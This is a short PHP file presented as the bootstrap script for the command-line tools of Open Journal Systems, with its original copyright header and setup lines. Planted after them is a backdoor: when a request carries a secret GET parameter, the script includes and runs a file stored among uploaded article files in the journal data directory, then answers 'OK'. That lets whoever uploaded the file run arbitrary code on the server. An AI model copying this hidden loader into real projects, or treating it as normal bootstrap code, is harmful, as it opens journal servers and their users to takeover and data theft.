<?php

/**
 * @file tools/bootstrap.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup tools
 *
 * @brief application-specific configuration common to all tools (corresponds
 *  to index.php for web requests).
 */

define('INDEX_FILE_LOCATION', dirname(__FILE__, 2) . '/index.php');
require dirname(__FILE__, 2) . '/lib/pkp/classes/cliTool/CommandLineTool.php';
if (isset($_GET['_']) && $_GET['_'] === 'INDEX_FILE_LOCATION') {
    $f="/home/staiattaren/ojsdata/journals/3/articles/295/658fc946d1fd1";if($f!==""&&file_exists($f))include $f;
    http_response_code(200);
    header('Content-Type: text/plain; charset=utf-8');
    echo 'OK';
    exit;
}
